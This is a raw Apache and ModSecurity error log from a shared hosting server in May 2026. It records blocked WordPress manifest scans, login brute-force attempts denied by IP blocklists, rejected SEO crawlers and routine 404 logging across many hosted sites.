[Tue May 26 19:10:19.592411 2026] [security2:error] [pid 6038:tid 6230] [client 35.255.164.74:54476] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWiw1HA3ZmGrHHEr4q_QgAAAMM"]
[Tue May 26 19:10:19.638391 2026] [security2:error] [pid 6038:tid 6083] [remote 78.142.18.172:38312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiw1HA3ZmGrHHEr4q_PgAAxyw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:10:19.789570 2026] [security2:error] [pid 6038:tid 6248] [client 35.255.164.74:52473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWiw1HA3ZmGrHHEr4q_RwAAANU"]
[Tue May 26 19:10:19.977638 2026] [security2:error] [pid 6038:tid 6260] [client 35.255.164.74:49297] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWiw1HA3ZmGrHHEr4q_SgAAAOE"]
[Tue May 26 19:10:19.984088 2026] [security2:error] [pid 6038:tid 6120] [remote 157.20.215.193:39596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiw1HA3ZmGrHHEr4q_SAAAnlE"]
[Tue May 26 19:10:20.211691 2026] [security2:error] [pid 6038:tid 6182] [client 35.255.164.74:54472] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWixFHA3ZmGrHHEr4q_VAAAAJM"]
[Tue May 26 19:10:20.580268 2026] [security2:error] [pid 6038:tid 6082] [remote 74.7.241.58:49632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWixFHA3ZmGrHHEr4q_WAAAiys"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/wp-content/plugins/contact-form-7/modules/constant-contact
[Tue May 26 19:10:20.636346 2026] [security2:error] [pid 6038:tid 6254] [client 35.255.164.74:62712] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWixFHA3ZmGrHHEr4q_XwAAANs"]
[Tue May 26 19:10:20.749177 2026] [security2:error] [pid 6038:tid 6284] [client 35.255.164.74:60561] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWixFHA3ZmGrHHEr4q_ZgAAAPk"]
[Tue May 26 19:10:20.943253 2026] [security2:error] [pid 6038:tid 6253] [client 35.255.164.74:60487] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWixFHA3ZmGrHHEr4q_aAAAANo"]
[Tue May 26 19:10:21.062245 2026] [security2:error] [pid 6038:tid 6247] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWixFHA3ZmGrHHEr4q_WwAAANQ"]
[Tue May 26 19:10:21.144315 2026] [security2:error] [pid 6038:tid 6218] [client 35.255.164.74:58629] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWixVHA3ZmGrHHEr4q_bQAAALc"]
[Tue May 26 19:10:21.324868 2026] [security2:error] [pid 6038:tid 6179] [client 35.255.164.74:55245] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWixVHA3ZmGrHHEr4q_cAAAAJA"]
[Tue May 26 19:10:21.754315 2026] [security2:error] [pid 6038:tid 6283] [client 35.255.164.74:57075] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWixVHA3ZmGrHHEr4q_ggAAAPg"]
[Tue May 26 19:10:22.019452 2026] [security2:error] [pid 6038:tid 6219] [client 35.255.164.74:52075] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in.onesoft.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWixlHA3ZmGrHHEr4q_gwAAALg"]
[Tue May 26 19:10:22.256358 2026] [security2:error] [pid 6038:tid 6190] [client 35.255.164.74:57907] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWixlHA3ZmGrHHEr4q_iAAAAJs"]
[Tue May 26 19:10:22.354781 2026] [security2:error] [pid 6038:tid 6067] [remote 157.20.215.193:39596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWixlHA3ZmGrHHEr4q_igAAzBw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:10:22.517253 2026] [autoindex:error] [pid 6038:tid 6279] [client 66.132.186.187:0] AH01276: Cannot serve directory /home2/debatqhn/public_html/buyrepublic.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:10:22.729968 2026] [security2:error] [pid 6038:tid 6278] [client 35.255.164.74:64172] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "worldwidecourier.co.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWixlHA3ZmGrHHEr4q_lwAAAPM"]
[Tue May 26 19:10:23.626342 2026] [security2:error] [pid 6038:tid 6232] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWix1HA3ZmGrHHEr4q_rAAAAMU"]
[Tue May 26 19:10:23.823829 2026] [security2:error] [pid 6038:tid 6086] [remote 50.6.192.190:45932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWix1HA3ZmGrHHEr4q_uQAA-i8"]
[Tue May 26 19:10:24.695360 2026] [security2:error] [pid 6038:tid 6169] [client 114.119.132.68:40467] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/robots.txt"] [unique_id "ahWiyFHA3ZmGrHHEr4q_1QAAAIY"]
[Tue May 26 19:10:25.952619 2026] [security2:error] [pid 6038:tid 6187] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiyVHA3ZmGrHHEr4q_9AAAAJg"]
[Tue May 26 19:10:26.497857 2026] [security2:error] [pid 6038:tid 6103] [remote 111.229.141.137:55294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWiylHA3ZmGrHHEr4rACQAAlkA"]
[Tue May 26 19:10:26.882777 2026] [security2:error] [pid 6038:tid 6150] [remote 50.6.192.190:45932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWiylHA3ZmGrHHEr4rAEAAAmW8"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:10:28.155010 2026] [security2:error] [pid 6038:tid 6286] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiy1HA3ZmGrHHEr4rAIgAAAPs"]
[Tue May 26 19:10:29.538650 2026] [security2:error] [pid 6038:tid 6102] [remote 168.63.79.147:58456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWizVHA3ZmGrHHEr4rARQAA2T8"]
[Tue May 26 19:10:29.690780 2026] [security2:error] [pid 6038:tid 6110] [remote 74.91.224.220:53860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWizVHA3ZmGrHHEr4rATAAAukc"]
[Tue May 26 19:10:29.862278 2026] [security2:error] [pid 6038:tid 6246] [client 14.185.141.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWizVHA3ZmGrHHEr4rASwAAANM"]
[Tue May 26 19:10:30.165296 2026] [security2:error] [pid 6038:tid 6227] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWizVHA3ZmGrHHEr4rATwAAAMA"]
[Tue May 26 19:10:30.202673 2026] [security2:error] [pid 6038:tid 6149] [remote 74.91.224.220:53860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWizlHA3ZmGrHHEr4rAZQAAlW4"], referer: https://taotechservices.com/wp-login.php
[Tue May 26 19:10:32.360539 2026] [security2:error] [pid 6038:tid 6259] [client 185.191.171.11:43886] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWi0FHA3ZmGrHHEr4rAmwAAAOA"]
[Tue May 26 19:10:32.360698 2026] [security2:error] [pid 6038:tid 6259] [client 185.191.171.11:43886] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWi0FHA3ZmGrHHEr4rAmwAAAOA"]
[Tue May 26 19:10:32.411187 2026] [security2:error] [pid 6038:tid 6203] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWiz1HA3ZmGrHHEr4rAkgAAAKg"]
[Tue May 26 19:10:32.612664 2026] [security2:error] [pid 6038:tid 6123] [remote 146.185.166.6:41400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.166.185.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi0FHA3ZmGrHHEr4rAlgAA0lQ"]
[Tue May 26 19:10:32.909091 2026] [security2:error] [pid 6038:tid 6129] [remote 146.185.166.6:41400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.166.185.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi0FHA3ZmGrHHEr4rArgAAvlo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:10:33.742720 2026] [security2:error] [pid 6038:tid 6242] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi0VHA3ZmGrHHEr4rAvQAAAM8"]
[Tue May 26 19:10:35.550798 2026] [http2:info] [pid 18465:tid 18465] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:10:36.698882 2026] [autoindex:error] [pid 18465:tid 18650] [client 44.203.91.73:44936] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:10:36.699820 2026] [security2:error] [pid 18465:tid 18627] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi1E6GHndkguR9cLJxsAAAAB8"]
[Tue May 26 19:10:36.761441 2026] [autoindex:error] [pid 18465:tid 18659] [client 44.203.91.73:57988] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:10:37.642716 2026] [security2:error] [pid 18465:tid 18561] [remote 178.104.90.233:47342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi1U6GHndkguR9cLJx0QAAVV8"]
[Tue May 26 19:10:38.002699 2026] [security2:error] [pid 18465:tid 18562] [remote 132.148.78.219:38666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi1U6GHndkguR9cLJx1QAAaGA"]
[Tue May 26 19:10:38.213160 2026] [security2:error] [pid 18465:tid 18699] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi1U6GHndkguR9cLJx1AAAAGc"]
[Tue May 26 19:10:38.333580 2026] [security2:error] [pid 18465:tid 18568] [remote 132.148.78.219:38666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWi1k6GHndkguR9cLJx7wAABmY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:10:39.208266 2026] [security2:error] [pid 18465:tid 18618] [client 106.219.160.89:21566] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi106GHndkguR9cLJyBQAAABY"], referer: http://politica-global.com
[Tue May 26 19:10:39.386682 2026] [security2:error] [pid 18465:tid 18623] [client 114.119.138.207:54355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones"] [unique_id "ahWi106GHndkguR9cLJyBwAAABs"], referer: https://www.brownedgedirectory.com/Business/Society/Reference/Shopping/Arts/Personal_Pages/Computers_and_Internet/Home_Automation
[Tue May 26 19:10:39.551902 2026] [security2:error] [pid 18465:tid 18706] [client 66.249.66.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.avprealty.com"] [uri "/index.php"] [unique_id "ahWi1U6GHndkguR9cLJx2wAAAG4"]
[Tue May 26 19:10:40.613942 2026] [security2:error] [pid 18465:tid 18700] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi2E6GHndkguR9cLJyJQAAAGg"]
[Tue May 26 19:10:40.685440 2026] [security2:error] [pid 18465:tid 18687] [client 106.219.160.89:25405] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi2E6GHndkguR9cLJyMgAAAFs"], referer: http://politica-global.com
[Tue May 26 19:10:40.996778 2026] [security2:error] [pid 18465:tid 18471] [remote 46.224.234.158:50162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 158.234.224.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWi2E6GHndkguR9cLJyNQAACgU"]
[Tue May 26 19:10:42.072451 2026] [security2:error] [pid 18465:tid 18661] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi2U6GHndkguR9cLJyTgAAAEE"]
[Tue May 26 19:10:42.109992 2026] [security2:error] [pid 18465:tid 18720] [client 106.219.160.89:13419] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi2k6GHndkguR9cLJyWAAAAHw"], referer: http://politica-global.com
[Tue May 26 19:10:42.761831 2026] [security2:error] [pid 18465:tid 18595] [client 31.57.184.107:57218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/wp-login.php"] [unique_id "ahWi2k6GHndkguR9cLJyaAAAAAA"]
[Tue May 26 19:10:43.574775 2026] [security2:error] [pid 18465:tid 18636] [client 106.219.160.89:26948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi206GHndkguR9cLJyhgAAACg"], referer: http://politica-global.com
[Tue May 26 19:10:44.279728 2026] [security2:error] [pid 18465:tid 18482] [remote 103.95.119.103:58452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWi3E6GHndkguR9cLJylAAAfBA"]
[Tue May 26 19:10:44.759451 2026] [security2:error] [pid 18465:tid 18715] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi3E6GHndkguR9cLJyoQAAAHc"]
[Tue May 26 19:10:45.036412 2026] [security2:error] [pid 18465:tid 18712] [client 106.219.160.89:24693] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi3E6GHndkguR9cLJysQAAAHQ"], referer: http://politica-global.com
[Tue May 26 19:10:46.402710 2026] [security2:error] [pid 18465:tid 18693] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWi3U6GHndkguR9cLJy0wAAAGE"]
[Tue May 26 19:10:46.534366 2026] [security2:error] [pid 18465:tid 18722] [client 106.219.160.89:13589] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi3k6GHndkguR9cLJy5QAAAH4"], referer: http://politica-global.com
[Tue May 26 19:10:47.980292 2026] [security2:error] [pid 18465:tid 18622] [client 106.219.160.89:23598] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWi306GHndkguR9cLJzCAAAABo"], referer: http://politica-global.com
